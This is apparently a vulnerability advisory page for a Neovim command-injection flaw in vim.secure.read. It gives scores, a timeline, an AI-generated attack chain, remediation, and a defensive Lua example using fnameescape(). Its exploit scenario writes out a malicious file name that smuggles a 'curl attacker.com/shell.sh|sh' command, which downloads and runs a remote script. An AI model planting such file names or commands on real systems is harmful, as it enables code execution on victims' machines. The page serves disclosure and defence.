
Neovim EUVD-2026-35018 | CVE-2026-11487 (LOW)
Command Injection (CWE-77)
2026-06-08 · VulDB · GHSA-6869-x4fx-m53f
Score: 1.9 (CVSS 4.0 · NVD)

Severity by source

NVD (primary): 1.9 LOW
CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · the only source for this CVE.

CVSS Vector (NVD)

CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Local
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: X

Lifecycle Timeline (4 events)

Jun 08, 2026 05:22 · NVD · Severity changed: MEDIUM -> LOW
Jun 08, 2026 05:22 · NVD · CVSS changed: 5.3 (MEDIUM) -> 1.9 (LOW)
Jun 08, 2026 05:18 · vuln.today · Source code evidence fetched
Jun 08, 2026 05:18 · vuln.today · Analysis generated

Description (CVE.org)

A flaw has been found in Neovim up to version 0.12.2. Affected is the function M.read in the file runtime/lua/vim/secure.lua of the component View Branch. Manipulation of the argument path can lead to command injection. The attack can be launched on the local host. The exploit has been published and may be used. The fix is identified as commit f83e0dcaf8cf18de94828341b0a1a61a86c75baf; applying the patch remediates this issue.

Analysis (AI-generated)

Command injection in Neovim up to version 0.12.2 allows a local attacker with low privileges to execute arbitrary Vim commands by crafting a file with a malicious name containing pipe (|) or other Vim Ex command separators. The vulnerable code path is the M.read function in runtime/lua/vim/secure.lua, which concatenates an unsanitized file path directly into a vim.cmd('sview ...') call when a user selects the 'View' action in Neovim's security trust prompt. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: Attacker writes a maliciously named file containing `|` to a shared directory
Delivery: Victim opens Neovim in the affected directory
Exploit: `vim.secure.read()` prompts the user with the trust dialog
Install: Victim selects the 'View' option
C2: Unsanitized fullpath is concatenated into `vim.cmd('sview ...')`
Execute: The pipe separator causes the injected Ex command to execute
Impact: Arbitrary Vim commands (and optionally shell commands via `:!`) run as the victim user

Vulnerability Assessment (AI-generated)

Exploitation: Exploitation requires the attacker to have write access to a filesystem path that will be encountered by the victim's Neovim session - for example, a shared project directory, a repository the victim clones, or any path from which Neovim triggers `vim.secure.read()` (such as directories containing `.nvimrc` or `.exrc` files). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment: The CVSS 3.1 base score of 5.3 (Medium) with vector AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L accurately captures a locally-exploitable, low-complexity attack requiring only standard user privileges with bounded CIA impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario: An attacker with local user-level filesystem access creates a file named `legitimate-project-config|!curl attacker.com/shell.sh|sh` (or a simpler Vim command variant such as `Xfile|let g:pwned=1`) in a shared project directory or repository that a developer is likely to open with Neovim. When the developer opens Neovim in that directory and the `vim.secure.read()` prompt appears asking whether to trust the file, selecting 'View' - the ostensibly safe option - causes the unsanitized filename to be injected into `vim.cmd('sview ...')`, executing the appended Vim or shell commands with the developer's privileges. …
Remediation: The primary remediation is to apply the upstream patch, which is available as commit `f83e0dcaf8cf18de94828341b0a1a61a86c75baf` merged via PR #39918 (https://github.com/neovim/neovim/pull/39918). … Detailed patch versions, workarounds, and compensating controls in full report.
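As an added illustration of the pattern described in the Analysis and Remediation sections above (this is not Neovim's code and not the upstream patch, whose exact change is not reproduced on this page): the unsafe string-concatenation shape beside a hardened form that escapes the path with `vim.fn.fnameescape()` before the Ex command is built. Function names and the sample file name are assumed for illustration; run it inside Neovim with `:luafile`.

```lua
-- Added example, not Neovim's own code. Shows the injection shape the
-- advisory describes and one way to harden it. Needs Neovim's Lua API
-- (vim.cmd, vim.fn); run with :luafile <this file>.

-- Vulnerable shape: the raw path is spliced into an Ex command string. On the
-- Ex command line '|' ends the current command and starts the next one, so a
-- file name containing '|' is parsed as two commands, not one file argument.
local function build_view_cmd_unsafe(fullpath)
  return 'sview ' .. fullpath
end

-- Hardened shape: fnameescape() backslash-escapes every character that is
-- special on the Ex command line ('|', '"', '%', '#', whitespace, wildcards,
-- ...), so the whole string is consumed as a single file name argument.
local function build_view_cmd_safe(fullpath)
  return 'sview ' .. vim.fn.fnameescape(fullpath)
end

-- Defensive self-check (assumed helper): does the built command still contain
-- an unescaped command separator? A '|' preceded by a backslash is literal.
-- This is an approximation for illustration, not a full Ex parser.
local function has_unescaped_bar(cmd)
  for i = 1, #cmd do
    if cmd:sub(i, i) == '|' and cmd:sub(i - 1, i - 1) ~= '\\' then
      return true
    end
  end
  return false
end

-- Constructed sample: a benign file name that contains an Ex separator.
local sample = 'project-config|echo "second command ran"'

local unsafe = build_view_cmd_unsafe(sample)
local safe = build_view_cmd_safe(sample)
print('unsafe: ' .. unsafe, has_unescaped_bar(unsafe))  -- true: two commands
print('safe:   ' .. safe, has_unescaped_bar(safe))      -- false: one command

-- Only the escaped form should ever be handed to vim.cmd():
-- vim.cmd(safe)
```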



EUVD-2026-35018 vulnerability details – vuln.today
